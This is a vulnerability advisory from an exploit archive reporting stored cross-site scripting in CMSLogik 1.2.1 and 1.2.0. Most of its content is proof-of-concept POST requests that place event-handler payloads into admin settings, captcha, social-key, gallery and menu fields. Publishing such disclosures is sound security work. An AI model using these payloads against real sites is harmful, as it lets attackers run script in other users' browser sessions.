CMSLogik 1.2.1 Cross Site Scripting

CMSLogik 1.2.1 Cross Site Scripting: Posted Apr 15, 2013; Authored by LiquidWorm | Site zeroscience.mk; CMSLogik version 1.2.1 suffers from multiple persistent cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 0d689e042dfbcc06d7598ea63bfdfc89986778efbd29a42b5b292eb8d35e93cc; Download | Favorite | View

CMSLogik 1.2.1 Cross Site Scripting


CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities


Vendor: ThemeLogik
Product web page: http://www.themelogik.com/cmslogik
Affected version: 1.2.1 and 1.2.0

Summary: CMSLogik is built on a solid & lightweight framework
called CodeIgniter, and design powered by Bootstrap. This
combination allows for greater security, extensive flexibility,
and ease of use. You can use CMSLogik for almost any niche that
your project might fall into.

Desc: CMSLogik suffers from multiple stored XSS vulnerabilities
when parsing user input to several parameters via POST method.
Attackers can exploit these weaknesses to execute arbitrary HTML
and script code in a user's browser session.

Tested on: Apache/2.2.22
           PHP/5.3.15


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2013-5136
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5136.php


05.04.2013

--

==============================================================================

POST http://localhost/cmslogik/admin/settings HTTP/1.1

admin_email  "onmouseover=prompt("XSS1")>
default_level  2
default_page  1
default_url  http://themelogik.com/cmslogik/
email_activate  0
header_title  "onmouseover=prompt("XSS2")>
login  1
registration  1
site_title  "onmouseover=prompt("XSS3")>
update_settings  Update Settings
welcome_email  0

==============================================================================

POST http://localhost/cmslogik/admin/captcha_settings HTTP/1.1

captcha_settings  Update
recaptcha_private  "onmouseover=prompt("XSS4")>
recaptcha_public  "onmouseover=prompt("XSS5")>

==============================================================================

POST http://localhost/cmslogik/admin/social_settings HTTP/1.1

fb_appid  "onmouseover=prompt("XSS6")>
fb_secret  "onmouseover=prompt("XSS7")>
social_settings  Update
tw_consumer_key  "onmouseover=prompt("XSS8")>
tw_consumer_secret  "onmouseover=prompt("XSS9")>

==============================================================================

POST http://localhost/cmslogik/admin/gallery/save_item_settings HTTP/1.1

imgid  76
long  test
short  test
slug  "onmouseover=prompt("XSS10")>
status  live
title  test

==============================================================================

POST http://localhost/cmslogik/admin/edit_menu_item_ajax HTTP/1.1

item_link  "onmouseover=prompt("XSS11")>
item_name  test
item_order  0
mid  9

==============================================================================

Top Authors In Last 30 Days

Red Hat 308 files
Ubuntu 67 files
Debian 24 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,133)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,177)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,160)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,495)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,025)
UNIX (9,482)
UnixWare (188)
Windows (6,786)
Other

CMSLogik 1.2.1 Cross Site Scripting

CMSLogik 1.2.1 Cross Site Scripting

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CMSLogik 1.2.1 Cross Site Scripting

Share This

CMSLogik 1.2.1 Cross Site Scripting

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems